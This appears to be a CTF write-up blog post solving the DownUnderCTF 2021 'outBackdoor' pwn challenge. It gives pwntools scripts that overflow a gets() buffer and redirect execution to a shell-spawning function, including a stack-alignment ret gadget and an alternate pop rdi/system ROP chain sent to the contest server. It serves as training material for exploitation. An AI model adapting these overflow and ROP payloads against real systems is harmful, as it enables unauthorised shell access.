DownUnderCTF 2021 : outBackdoor PWN (Ret2win)
A fairly easy challenge in the PWN category. Let me explain how I solved this challenge.
First, we check the file type and the memory protection involved with the binary.
We can see this is a 64bit binary, dynamically linked and not stripped. Makes our life easier. NX bit is enabled, So we cannot execute anything from the stack. Let’s look at the functions
We have our main() and a suspicious looking outbackdoor() function. First let’s disassemble the main function and see what’s vulnerable there.
We have a gets() function which is vulnerable to buffer overflow attacks. We just need to find offset values to overflow the buffer and RBP to reach the RIP/Return address. For this, I use pattern create and pattern offset in gdb-peda and we check the register RBP register.
We can see that RBP has been overwritten with “AACAA-AA”. We check this value in the pattern we gave and add 8 to get the offset value to reach the RIP/Return address.
Now we add 8 to this value which is 24. So 24 Junk characters to buffer overflow and reach RIP/Return address region.
Now lets disassemble outBackdoor()
We can see a system call. But let’s see what it is calling. For this, I used ghidra to make it much easier.
We can see that it calls “/bin/sh”. So this is a basic ret2win challenge where we just have to overwrite the buffer to reach the RIP region and then call the outBackdoor() function. I tried doing that in my local machine first. Here is my exploit
from pwn import *win = p64(0x00000000004011d7)
overwrite = b"A"*24payload = overwrite + winp = process("./outBackdoor")
p.sendline(payload)
p.interactive()
Running this code pops us the shell.
So now it’s just simple! just run this code by changing from local to their server.
from pwn import *win = p64(0x00000000004011d7)
overwrite = b"A"*24payload = overwrite + win#p = process("./outBackdoor") #Local
p = remote("pwn-2021.duc.tf",31921) #Server
p.sendline(payload)
p.interactive()
Unfortunately…
I got an EOF while running this code. This is a common problem in Ubuntu-based machines.
Giving it a read will tell about the problem and how to fix it. Just add “ret” after overwrite. We can find a perfect gadget ret for our exploit using ROPgadget.
from pwn import *win = p64(0x00000000004011d7)
overwrite = b"A"*24
ret = p64(0x0000000000401016)payload = overwrite + ret + win#p = process("./outBackdoor")
p = remote("pwn-2021.duc.tf",31921)
p.sendline(payload)
p.interactive()
Running this popped the shell and we get our flag!
There we go!
Here is an alternate solution to this if you had problems with that “ret”.
from pwn import *overwrite = b"A"*24
poprdi = p64(0x000000000040125b) # Got from ROPgadget
binsh = p64(0x4020cd) # Used find "/bin/sh" in gdb-peda
system = p64(0x00000000004011f3) # Got from outBackdoor function
ret = p64(0x0000000000401016) # Got from ROPgadgetpayload = overwrite + poprdi + binsh + systemp = remote("pwn-2021.duc.tf",31921)
p.sendline(payload)
p.interactive()
Hope you understood the challenge. Do check out my other blogs.
Don’t forget to give some claps if you reached here :) Follow me for more write-ups.
Goodbye:)
